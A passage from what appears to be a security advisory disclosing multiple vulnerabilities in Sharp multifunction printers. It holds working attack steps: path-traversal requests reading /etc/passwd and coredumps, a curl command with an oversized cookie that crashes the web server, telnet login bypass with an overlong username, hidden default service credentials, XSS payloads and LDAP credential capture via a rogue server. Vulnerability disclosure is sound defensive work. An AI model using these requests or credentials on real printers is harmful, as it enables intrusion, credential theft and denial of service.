1 root root 0 Jan 1 2000 core-main.log.gz.007 ... sh-4.3# cd /mnt/log && ls -la|grep ERR -rw-r--r-- 1 root root 0 May 15 14:11 ERR_IFS.log -rw-r--r-- 1 root root 17316180 May 15 14:11 ERR_core-main.log.gz -rw-r--r-- 1 root root 0 May 15 14:11 ERR_core-pdl.log.gz -rw-r--r-- 1 root root 97316 May 15 14:11 ERR_kern.log -rw-r--r-- 1 root root 0 May 15 14:11 ERR_log_ui_mainview.log -rw-r--r-- 1 root root 314188 May 15 14:11 ERR_main.log -rw-r--r-- 1 root root 315 May 15 14:11 ERR_nf.log -rw-r--r-- 1 root root 21262 May 15 14:11 ERR_pdl.log sh-4.3# The files are world-readable and contain valid coredump files as shown below: kali% file core-main.log core-main.log: ELF 32-bit LSB core file, ARM, version 1 (SYSV), SVR4-style, from '/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask -nodlychk', real uid: 0, effective uid: 0, real gid: 0, effective The core file contains in clear-text: - - session IDs; - - password for all the users (even when the printer booted and no user logged into the printer (!)); - - emails; - - Encryption keys. For example, some keys: kali% strings core-main.log|grep -A 4 -B 4 ENCRYPT_KEY CloudPollingConst VENDOR_KEY YiqUwHIymoiuwFPjja04u+Q+zeokggNSuYv4g+axNAIx4vwnnrPmfsFrAsqZr4RFeR6EgwWRvzgledwTz9MZAw== TENANT_ENCRYPT_KEY GMuQt[REDACTED] The core file contains the password (`PASS-PIERRE`) of the admin user even when the admin user has not been logged-in the printer since the printer booted: kali% zcat core-main.log.gz.001 | strings | grep PASS-PIERRE PASS-PIERRE All the clear-text passwords can be found inside the core file: kali% zcat core-main.log.gz.001 | strings | less /mnt/std01/ACCBURS/ /mnt/std04/ACC/BROWSER/BROWSER_NONUSR /mnt/std01/ACC/AccBackUp/BROWSER_NONUSR /mnt/std01/ACC/AccUserInfo /mnt/std04/ACC /mnt/std01/ACC/AccUserInfo2 /mnt/std04/ACC/BROWSER /mnt/std01/ACC/AccGrpPrmtInfo /mnt/std01/ACCBURS /mnt/std01/ACC/AccFlashUserCounter /mnt/std01/ACC/AccFlashBackUp /mnt/std01/ACC/AccTotalPix /mnt/std01/ACC/AccBackUp/JobInfo Other User Other Vender Vender Administrator admin PASS-PIERRE <------------------- clear-text password for admin Service service service User users users Vender2 Vender2 FSS User servicefss servicefss System Operator sysadmin sysadmin Device Account deviceaccount deviceaccount /mnt/std01/ACC/AccGrpHomeInfo /mnt/std01/ACC/AccBackUp /mnt/std01/ACC /mnt/std01/ACC/AccUserPixel /mnt/std01/ACC/BROWSER /mnt/std01/ACC/AccGrpCstmInfo There is no encryption for the /mnt/log partition: sh-4.3# df -h /mnt/log Filesystem Size Used Avail Use% Mounted on /dev/mmcblk0p3 791M 145M 589M 20% /mnt/log sh-4.3# All the passwords can be found inside the core file after the printer just booted and no user logged: this is abnormal and shows the authentication mechanism is incorrectly implemented. A local attacker can extract all the passwords. A remote attacker using an additional vulnerability (e.g. Local File Inclusion) can recover all the passwords and compromise the printer (see the next vulns). ## Details - Arbitrary Directory Listing without authentication It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file. It is possible to list the manual index files by visiting the `/installed_emanual_list.html` without authentication: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] By changing the folder argument in the address, it is possible to browse the entire file systems of the printer. Request to `installed_emanual_list.html?folder=../../../` will list the `/` file system: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Files located in /etc: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Using the vulnerability [Local File Inclusion allowing to read any file (e.g. Coredump files), it is then possible to download any file. An attacker can browse the file systems of the printers and download any file. A remote attacker can recover all the passwords by downloading coredump files and compromise the printer. ## Details - Local File Inclusion allowing to read any file (e.g. Coredump files) without authentication It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer. Normal request to retrieve the manual index files: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] By default, the manual index files are located in /mnt/std_data/manual inside the printer: sh-4.3# pwd /mnt/std_data/manual sh-4.3# ls -la MX-M4071_inch_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M4071_inch_web.idx sh-4.3# ls -la total 233 drwxrwxr-x 4 1000 pulse 2536 Jul 31 2020 . drwxr-xr-x 9 root root 4096 Mar 1 2022 .. -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_ab_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_aus_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_canada_web.idx -rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M2651_europe_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_inch_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_uk_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_usa_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_ab_web.idx -rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M3051_aus_web.idx -rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_canada_web.idx -rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M3051_europe_web.idx The normal request is: GET /installed_emanual_down.html?path=/manual/MX-M4071_inch_web.idx HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 The `path=` argument can be manipulated to retrieve any file in the printer. The session cookie is not required as this vulnerability does not require authentication: For example, retrieving /etc/passwd: GET /installed_emanual_down.html?path=/manual/../../../etc/passwd HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] It is possible to generate a coredump file, download it and extract credentials to remotely compromise the printer without credentials using this vulnerability along with the vulnerabilities: - - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication - - Memory corruption in the main program - Remote Code Execution against the web server without authentication - - World-readable coredump files and insecure storage of credentials ### Generation of the coredump file on the printer Using the HTTP request: kali% var=`perl -e "print 'A'x639"`; curl -v -b "MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html * Trying 10.0.0.1:80... * Connected to 10.0.0.1 (10.0.0.1) port 80 (#0) > GET /system.html HTTP/1.1 > Host: 10.0.0.1 > User-Agent: curl/7.88.1 > Accept: */* > Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB > ### Local File Inclusion of the coredump file We download the coredump file using the Local File Inclusion: kali% curl -i -s -k -X $'GET' \ -H $'Host: 10.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://10.0.0.1/installed_emanual_down.html?path=/manual/../../../mnt/log/core-main.log.gz.001' > core-main.log.gz.001 kali% ls -la total 16920 drwx------ 2 user user 4096 May 15 10:13 . drwx------ 6 user user 4096 May 15 10:13 .. -rw------- 1 user user 17316455 May 15 10:13 core-main.log.gz.001 kali% head -n 9 core-main.log.gz.001 HTTP/1.1 200 OK Server: Rapid Logic/1.1 MIME-version: 1.0 Date: Thu Jan 1 00:02:12 1970 GMT Content-Type: application/octet-stream; name=core-main.log.gz.001 Content-disposition: attachment; filename=core-main.log.gz.001 Content-Length: 17316180 Connection: close We remove the first 9 lines from the core file (corresponding to HTTP headers) to generate a valid gzip file: kali% vi core-main.log.gz.001 kali% file core-main.log.gz.001 core-main.log.gz.001: gzip compressed data, last modified: Mon May 15 14:09:45 2023, from Unix, original size modulo 2^32 176379936 gzip compressed data, reserved method, ASCII, has CRC, has comment, encrypted, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 176379936 kali% ### Retrieve of credentials using the coredump files The core file contains the password (`PASS-PIERRE`) of the admin user even when the admin user has not been logged-in to the printer since the printer booted: All the passwords can be found inside the core file, located near the `admin` string: kali% zcat core-main.log.gz.001 | strings | less /mnt/std01/ACCBURS/ /mnt/std04/ACC/BROWSER/BROWSER_NONUSR /mnt/std01/ACC/AccBackUp/BROWSER_NONUSR /mnt/std01/ACC/AccUserInfo /mnt/std04/ACC /mnt/std01/ACC/AccUserInfo2 /mnt/std04/ACC/BROWSER /mnt/std01/ACC/AccGrpPrmtInfo /mnt/std01/ACCBURS /mnt/std01/ACC/AccFlashUserCounter /mnt/std01/ACC/AccFlashBackUp /mnt/std01/ACC/AccTotalPix /mnt/std01/ACC/AccBackUp/JobInfo Other User Other Vender Vender Administrator admin PASS-PIERRE <--------------------- clear-text password for admin Service service service User users users Vender2 Vender2 FSS User servicefss servicefss System Operator sysadmin sysadmin Device Account deviceaccount deviceaccount /mnt/std01/ACC/AccGrpHomeInfo /mnt/std01/ACC/AccBackUp /mnt/std01/ACC /mnt/std01/ACC/AccUserPixel /mnt/std01/ACC/BROWSER /mnt/std01/ACC/AccGrpCstmInfo ### Retrieve of credentials using configuration files The configuration files containing the credentials can be found in the /mnt/std04/DBMS/uaccnt. When a password is updated, the files present in `/mnt/std04/DBMS/uaccnt/*` will be updated. It is possible to retrieve some credentials from these files: sh-4.3# pwd /mnt/std04/DBMS/uaccnt sh-4.3# hexdump -C 9.01 00000000 ff ff ff bf ff ff ff ff ff ff ff ff ff ff ff ff |................| 00000010 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| [...] 00005010 61 64 6d 69 6e 02 00 00 00 00 d0 00 00 64 65 76 |admin........dev| 00005020 69 63 65 61 63 63 6f 75 6e 74 09 00 00 00 00 50 |iceaccount.....P| 00005030 00 00 4f 74 68 65 72 01 00 00 00 00 70 00 00 73 |..Other.....p..s| 00005040 65 72 76 69 63 65 04 00 00 00 07 30 00 00 66 73 |ervice.....0..fs| 00005050 73 07 00 00 00 01 70 00 00 79 73 61 64 6d 69 6e |s.....p..ysadmin| 00005060 08 00 00 00 00 50 00 00 75 73 65 72 73 05 00 00 |.....P..users...| 00005070 00 00 60 00 00 56 65 6e 64 65 72 03 00 00 00 06 |..`..Vender.....| 00005080 10 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 |...2............| 00005090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| [...] sh-4.3# An attacker can download these files and analyze them to retrieve the passwords. ## Details - Backdoor webpage - Listing of session cookies without authentication It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers. It is possible to list the `MFPSESSIONID` session cookies by visiting the `/sessionlist.html` webpage without authentication: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] It is also possible to use curl from another machine: kali% curl -kv http://10.0.0.1/sessionlist.html [...] <h2>Session list</h2> <table class="matrix"> <tr> <th>No.</th> <th>User</th> <th>From</th> <th>Last login</th> <th>Last access</th> <th>Language ID</th> <th>Cookie</th> </tr> <tr> <td>0000</td> <td>Administrator</td> <td>10.0.0.10</td> <td>2023/05/16(Tue) 13:35:38</td> <td>2023/05/16(Tue) 13:35:38</clearTOStd> <td>02</td> <td>MFPSESSIONID=0200736B459709ABA789505BF27D765756D39B82B7ADE25E302820230516133538428B5C9D</td> </tr> </table> [...] An attacker can retrieve valid session cookies and compromise the printer. Note that a victim user must have been logged inside the printer prior to this attack in order to retrieve the corresponding session cookies. ## Details - Configuration webpages reachable without authentication It was observed that some authenticated webpages are reachable without authentication on Sharp printers. Any attacker can modify parameters on these webpages without authentication. A list of webpages supposed to require authentication but reachable without authentication is listed below: - - /address_smime_install.html - - /send_fax_fcode_entry.html - - /send_fax_fcode_entry_relay.html - - /send_fax_fcode.html - - /send_inbound_address_entry.html - - /send_inbound_entry.html - - /send_inbound.html - - /send_receive_fw.html - - /printer_ps.html For example, `/printer_ps.html`: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] An attacker can modify parameters of the printers without authentication. The vendor confirmed this is the attended behavior. ## Details - Reboot without authentication - Remote DoS It was observed that a specific webpage is reachable without authentication on Sharp printers. Any attacker can use this webpage to reboot the printer. It is possible to reboot the printer by visiting the /sys_trayentryreboot.html without authentication. When confirming the `Reboot Now` action, the printer will reboot: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The printer will then reboot and will be unreachable for some minutes: PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data. ^C --- 10.0.0.1 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 4083ms An attacker can DoS the printer by rebooting it indefinitely. ## Details - Backdoor access - Service Sharp printers are configured with default credentials. Some accounts are hidden and can be abused by attackers to compromise the printers. When analyzing the configuration of the printers, it appears there are several accounts visible on the web interface: - - `Administrator` (uid 3) - - `System Administrator` (uid 8, as `System Operator`) - - `User` (uid 5) - - `Device Account` (uid 9) - - `Other User` (uid 1) After doing reverse engineering, the default passwords have been obtained: - - System Administrator: sysadmin - - User: users - - Device Account: deviceaccount - - Other User: Other The Service account (corresponding to uid 4) does not appear on the user list, is not documented and allows an attacker to change the configuration of the printers and update the firmware image. The password for Service is `service`. Several webpages can be found corresponding to this service user: - - /devicecloning_pp.html - - /devicecloning.html - - /service_ura_status_page.html - - /service_testpage_ok.html - - /service_testpage.html - - /service_syslog_view.html - - /service_syslog_settings_storage.html - - /service_syslog_settings_server.html - - /service_syslog_setting.html - - /service_syslog_select.html - - /service_syslog_save.html - - /service_syslog_download.html - - /service_softsw.html - - /service_reboot.html - - /serfildata_savepc.html - - /service_account.html - - /service_admin.html - - /service_device_cloning.html - - /service_filingdata.html - - /service_testpage.html - - /service_firm.html - - /service_testpage.html - - /service_font_down.html - - /service_joblog.html - - /service_joblog_list.html - - /service_joblog_download.html - - /service_joblog_select.html - - /service_joblog_list_download.html - - /service_machineid.html - - /service_password.html - - /sys_paperproperty.html - - /sys_paperproperty_entry.html Listing of users: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The service account can be discovered by visiting the webpage http://[ip]/account_user_entry.html?userid=-4 but the information cannot be edited: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The `service` account can be used to change the configuration of the printer. The default webpage is http://[ip]/service_testpage.html and provides access to a lot of hidden functionalities: - - Device Cloning - - Update of the firmware image to insert a malicious firmware image - - Export settings - - Configuration of the log server (disabling the logs, erasing the logs, ...) Device cloning: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Update of the firmware: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] An attacker can use this additional backdoor account to compromise the printers. ## Details - Backdoor access - FSS User Sharp printers are configured with default credentials. Some accounts are hidden and can be abused by attackers to compromise the printers. When analyzing the configuration of the printers, it appears there are several accounts visible on the web interface: - - `Administrator` (uid 3) - - `System Administrator` (uid 8, as `System Operator`) - - `User` (uid 5) - - `Device Account` (uid 9) - - `Other User` (uid 1) After doing reverse engineering, the default passwords have been obtained: - - System Administrator: sysadmin - - User: users - - Device Account: deviceaccount - - Other User: Other The FSS User account (corresponding to uid 7) does not appear on the user list, is not documented and allows an attacker to change the configuration of the printers and update the firmware image. The password for FSS User is `servicefss`. The FSS User has also admin privileges. Several webpages can be found corresponding to this service user: - - /fss_default.html - - /fss.html - - /fss_password.html - - /fss_account.html - - /fss_backup_export.html - - /fss_backup.html - - /fss_backup_reboot.html The service account can be discovered by visiting the webpage http://[ip]/account_user_entry.html?userid=-7 but the information cannot be edited: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The FSS User account can be used to change the configuration of the printer. The default webpage is http://[ip]/fss.html and provides access to hidden functionalities related to the support and a blind SSRF vulnerability: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] Reboot of the printer: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] An attacker can use this additional backdoor account to compromise the printers. ## Details - Insecure default credentials Sharp printers are configured with default and insecure credentials. When doing reverse engineering against the `main` binary located inside the Sharp firmware image, we can extract the list of passwords for: - - `Administrator` / `admin` - - `Other User` / `Other` - - `Device Account` / `deviceaccount` - - `FSS User` / `servicefss` - - `Service` / `service` - - `User` / `users` - - `System Operator` / `sysadmin` Listing of username when analyzing main: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The listing of users can be retrieved from the web interface, using the admin user: - - `Other User` - http://[ip]/account_user_entry.html?userid=-1 - - `Vender` - http://[ip]/account_user_entry.html?userid=-2 - - `Administrator` - http://[ip]/account_user_entry.html?userid=-3 - - `Service` - http://[ip]/account_user_entry.html?userid=-4 - - `User` - http://[ip]/account_user_entry.html?userid=-5 - - `Vender2` - http://[ip]/account_user_entry.html?userid=-6 - - `FSS User` - http://[ip]/account_user_entry.html?userid=-7, with admin privileges - - `System Operator` - http://[ip]/account_user_entry.html?userid=-8 - - `Device Account` - http://[ip]/account_user_entry.html?userid=-9, with admin privileges An attacker can use these default accounts to compromise the printers. The vendor confirmed this is the attended behavior. ## Details - read admin access on telnet It is possible to bypass the authentication of the telnet server of any Sharp Printer (running any firmware version) by specifying an invalid user. This authentication bypass provides an attacker with a full READ admin access to the printer. Without the corresponding password of the admin user, the access will be denied: kali% telnet 10.0.0.1 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server. Copyright(C) 2005- SHARP CORPORATION Copyright(C) 2005- silex technology, Inc. login: admin 'admin' user needs password to login. password: Login incorrect. Connection closed by foreign host. kali% It is possible to send an invalid username (e.g. `adminAAAAAAAAAAAAAAAA[...]`) to bypass the authentication and get READ access with admin privileges: kali% telnet 10.0.0.1 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server. Copyright(C) 2005- SHARP CORPORATION Copyright(C) 2005- silex technology, Inc. login: adminAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA User 'adminAAA' logged in. No. Item Value (level.1) ---------------------------------------------------------------------- 1 : Configure General 2 : Configure TCP/IP 3 : Configure NetWare 4 : Configure AppleTalk 5 : Configure NetBIOS 6 : Configure AP I/F 7 : Configure Gateway 97 : Display Status 98 : Reset Settings to Defaults 99 : Exit Please select(1 - 99)? 1 No. Item Value (level.2) ---------------------------------------------------------------------- 1 : Print status page after bootup : NO 2 : SSL Mode : ALL 3 : Rendezvous Enable : ENABLE 4 : Rendezvous Name : "MX-M365N" 5 : SMBC Enable : ENABLE 6 : 802.1X auth 7 : Frame Size : 1514 8 : SMB Authentication Flags : 15 99 : Back to prior menu Please select(1 - 99)? 99 No. Item Value (level.1) ---------------------------------------------------------------------- 1 : Configure General 2 : Configure TCP/IP 3 : Configure NetWare 4 : Configure AppleTalk 5 : Configure NetBIOS 6 : Configure AP I/F 7 : Configure Gateway 97 : Display Status 98 : Reset Settings to Defaults 99 : Exit Please select(1 - 99)? ## Details - XSS on the /login.html page There are 2 reflected XSS vulnerabilities located in the `/login.html` webpage. HTTP request sent to `/login.html`, with the query string containing the payload `<XSS>";alert('XSS');"`: The first XSS appears on the response on line 32: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The second XSS appears on the response on line 183: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] ## Details - XSS on all other HTML pages There are 3 reflected XSS vulnerabilities located in all the html webpages. An attacker can send a HTTP request to any HTML webpage with the query string containing `";alert(1);<XSS>` to trigger: - - 2 JavaScript-based XSS - - 1 HTML based XSS The HTTP request is sent to `/main.html`, with the query string containing the payload `";alert(1);<XSS>`: The first XSS appears on the response on line 32: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The second XSS appears on the response on line 87: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] The third XSS appears on the response on line 221: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] - From the tests, all the HTML webpages are vulnerable to these 3 XSS. ## Details - Exfiltration of LDAP credentials by downgrading the security Sharp printers can be configured with a connection to a LDAP server, with credentials. While the LDAP password is not shown on the web interface, an attacker with the admin password can retrieve the password by downgrading the authentication type to `SIMPLE`, which will enable clear-text communication to a malicious server. With the `Connect Test`, an attacker can downgrade the security of the authentication to `SIMPLE` and retrieve the password in clear-text by specifying a malicious OpenLDAP server: LDAP Configuration - http://10.0.0.1/nw_ldap_entry.html?ldapid=0: [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] [please use the HTML version at https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html] With a malicious OpenLDAP server receiving the connection, the password will be displayed in the logs: kali# /usr/sbin/slapd -d 10 -f /etc/ldap/slapd.conf -h "ldap:/// ldaps:///" 6458d55e.3103c227 0x7fe72981e200 @(#) $OpenLDAP: slapd 2.5.13+dfsg-5 (Feb 8 2023 01:56:12) $ Debian OpenLDAP Maintainers <pkg-openldap-devel@lists.alioth.debian.org> 6458d55e.319e91af 0x7fe72981e200 slapd starting 6458d55e.31a5bad7 0x7fe727bff6c0 daemon: added 4r listener=(nil) 6458d55e.31a6707c 0x7fe727bff6c0 daemon: added 7r listener=0x5586390ead60 6458d55e.31a6b53d 0x7fe727bff6c0 daemon: added 8r listener=0x5586390eae30 6458d55e.31a6f00d 0x7fe727bff6c0 daemon: added 9r listener=0x5586390ea740 6458d55e.31a7661d 0x7fe727bff6c0 daemon: added 10r listener=0x5586390ea810 6458d55e.31a94b33 0x7fe727bff6c0 daemon: epoll: listen=7 active_threads=0 tvp=zero 6458d55e.31a96f6a 0x7fe727bff6c0 daemon: epoll: listen=8 active_threads=0 tvp=zero 6458d55e.31a97916 0x7fe727bff6c0 daemon: epoll: listen=9 active_threads=0 tvp=zero 6458d55e.31a981b7 0x7fe727bff6c0 daemon: epoll: listen=10 active_threads=0 tvp=zero 6458d55e.31a9933f 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d55e.31a99baf 0x7fe727bff6c0 daemon: activity on:6458d55e.31a9a375 0x7fe727bff6c0 6458d55e.31a9b6dc 0x7fe727bff6c0 daemon: epoll: listen=7 active_threads=0 tvp=zero 6458d55e.31a9d392 0x7fe727bff6c0 daemon: epoll: listen=8 active_threads=0 tvp=zero 6458d55e.31a9dc6e 0x7fe727bff6c0 daemon: epoll: listen=9 active_threads=0 tvp=zero 6458d55e.31a9f2b6 0x7fe727bff6c0 daemon: epoll: listen=10 active_threads=0 tvp=zero 6458d562.355e84dc 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d562.355f3b42 0x7fe727bff6c0 daemon: activity on:6458d562.355f593f 0x7fe727bff6c0 6458d562.355fde77 0x7fe727bff6c0 daemon: epoll: listen=7 busy 6458d562.355ffeb9 0x7fe727bff6c0 daemon: epoll: listen=8 active_threads=0 tvp=zero 6458d562.35601b67 0x7fe727bff6c0 daemon: epoll: listen=9 active_threads=0 tvp=zero 6458d562.3560372e 0x7fe727bff6c0 daemon: epoll: listen=10 active_threads=0 tvp=zero 6458d562.35638596 0x7fe7273fe6c0 daemon: accept() = 14 6458d562.35646744 0x7fe7273fe6c0 daemon: listen=7, new connection on 14 6458d562.3564fc1e 0x7fe727bff6c0 daemon: activity on 1 descriptor 6458d562.35656f57 0x7fe727bff6c0 daemon: activity on:6458d562.35658b4c 0x7fe727bff6c0 6458d562.3565d7f5 0x7fe727bff6c0 daemon: epoll: listen=7 active_threads=0 tvp=zero 6458d562.3565fb50 0x7fe727bff6c0 daemon: epoll: listen=8 active_threads=0 tvp=zero 6458d562.356615c1 0x7fe727bff6c0 daemon: epoll: listen=9 active_threads=0 tvp=zero 6458d562.35662d31 0x7fe727bff6c0 daemon: epoll: listen=10 active_threads=0 tvp=zero 6458d562.35691b42 0x7fe7273fe6c0 daemon: added 14r (active) listener=(nil) 6458d562.356a5b81 0x7fe727bff6c0 daemon: activity on 2 descriptors 6458d562.356b0c68 0x7fe727bff6c0 daemon: activity on:6458d562.356b54fa 0x7fe727bff6c0 14r6458d562.356b948e 0x7fe727bff6c0 6458d562.356bfc9e 0x7fe727bff6c0 daemon: read active on 14 6458d562.356ce70e 0x7fe727bff6c0 daemon: epoll: listen=7 active_threads=0 tvp=zero 6458d562.356d5571 0x7fe727bff6c0 daemon: epoll: listen=8 active_threads=0 tvp=zero 6458d562.356db465 0x7fe727bff6c0 daemon: epoll: listen=9 active_threads=0 tvp=zero 6458d562.356e155f 0x7fe727bff6c0 daemon: epoll: listen=10 active_threads=0 tvp=zero 6458d562.356f5783 0x7fe7273fe6c0 ldap_read: want=8, got=8 6458d562.356f9399 0x7fe7273fe6c0 0000: 30 31 02 01 01 01 01 01 01...... 6458d562.356fd33a 0x7fe7273fe6c0 ldap_read: want=43, got=43 6458d562.3570169a 0x7fe7273fe6c0 0000: 01 03 04 15 6c 64 61 70 2d 63 72 65 64 73 35 40 ....ldap-creds5@ 6458d562.357033a1 0x7fe7273fe6c0 0010: 64 6f 6d 61 69 6e 2e 6c 61 2e 2e 50 41 53 53 57 domain.la..PASSW 6458d562.35704d44 0x7fe7273fe6c0 0020: 4f 52 44 2d 49 4e 2d 43 4c 45 41 52 ORD-IN-CLEAR 6458d562.357231ef 0x7fe7273fe6c0 ldap_read: want=8 error=Resource temporarily unavailable It is also 